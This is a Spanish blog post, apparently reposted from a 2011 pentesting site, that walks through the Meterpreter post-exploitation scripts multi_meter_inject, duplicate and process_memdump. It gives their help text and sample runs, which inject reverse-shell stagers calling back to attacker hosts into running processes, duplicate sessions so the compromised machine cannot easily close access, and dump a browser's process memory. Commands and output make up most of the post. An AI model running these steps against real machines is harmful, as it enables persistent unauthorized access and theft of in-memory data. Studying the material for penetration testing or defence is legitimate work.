multi_meter_inject
Este script intentará crear una conexión reversa en la memoria de uno o muchos PID’s especificados por parámetro, en el caso de que estos PID no sean indicados, se iniciará por defecto un nuevo proceso con notepad.exe. Una de las principales ventajas de este script es que se pueden especificar múltiples host y multiples PID’s para crear el stager de meterpreter, esto significa que la sesión meterpreter creada, puede “replicarse” a otras maquinas en las que el atacante también tendrá un payload meterpreter esperando a la conexión del stager.En resumen, el atacante tendrá la posibilidad de crear tantas sesiones meterpreter contra la maquina comprometida como maquinas disponga y cada una de estas sesiones será “insertada” en un proceso que se encuentra en ejecución en la maquina comprometida.
| meterpreter > run multi_meter_inject -h
Meterpreter Script for injecting a reverce tcp Meterpreter Payloadin
to memory of multiple PIDs, if none is provided a notepad process.will
be created and a Meterpreter Payload will be injected in to each. OPTIONS: -h Help menu. -m Start Exploit multi/handler for return connection -mp -mr -p -pt |
| meterpreter > run multi_meter_inject -mr 192.168.1.36,192.168.1.37 -p 3344 -mp 628,792
[*] Creating a reverse meterpreter stager: LHOST=192.168.1.36 LPORT=3344 [*] Injecting meterpreter into process ID 628 [*] Allocated memory at address 0x00d60000, for 290 byte stager [*] Writing the stager into memory… [+] Successfully injected Meterpreter in to process: 628 [*] Creating a reverse meterpreter stager: LHOST=192.168.1.37 LPORT=3344 [*] Injecting meterpreter into process ID 792 [*] Allocated memory at address 0x003e0000, for 290 byte stager [*] Writing the stager into memory… [+] Successfully injected Meterpreter in to process: 792 |
duplicate
Este script tiene una funcionalidad bastante similar al script multi_meter_inject ya que se encarga de replicar la sesión meterpreter en otro proceso del sistema operativo con el fin de que sea difícil cerrar el acceso desde la maquina atacada a la maquina del atacante| meterpreter > run duplicate -h
OPTIONS: -D Disable the automatic multi/handler (use with -r to accept on another system) -P -e -h This help menu -p -r -s Spawn new executable to inject to. Only useful with -P. -w Write and execute an exe instead of injecting into a process |
| meterpreter > run duplicate -r 192.168.1.34 -p 4444
[*] Creating a reverse meterpreter stager: LHOST=192.168.1.34 LPORT=4444 [*] Running payload handler [*] Current server process: sgiByfbLo.exe (1780) [*] Duplicating into notepad.exe… [*] Injecting meterpreter into process ID 3884 [*] Allocated memory at address 0x00e10000, for 290 byte stager [*] Writing the stager into memory… [*] New server process: 3884 |
process_memdump
En una entrada anterior se ha indicado el uso de pmdump para realizar un volcado de memoria usando un script de meterpreter externo al framework, con este comando se puede llevar a cabo esta misma tarea, solamente que en lugar de utilizar pmdump se utiliza memdump sobre el proceso seleccionado| meterpreter > run process_memdump -h
USAGE: EXAMPLE: run process_dump putty.exe EXAMPLE: run process_dump -p 1234 OPTIONS: -h Help menu. -n -p -q Query the size of the Process that would be dump in bytes. -r -t toggle location information in dump. |
| meterpreter > run process_memdump -p 556
[*] Dumping memory for iexplore.exe [*] Dumping Memory of iexplore.exe with PID: 556 [*] base size = 64 [*] base size = 128 [*] base size = 192 [*] base size = 1224 [*] base size = 1228 [*] base size = 1280 [*] base size = 1344 [*] base size = 2368 [*] base size = 2432 [*] base size = 2496 [*] Saving Dumped Memory to /root/.msf3/logs/scripts/proc_memdump/192.168.1.36_iexplore.exe_556_20110512.0758.dmp |
Fuente: http://thehackerway.com/2011/06/10/359/
Entradas
No hay comentarios:
Publicar un comentario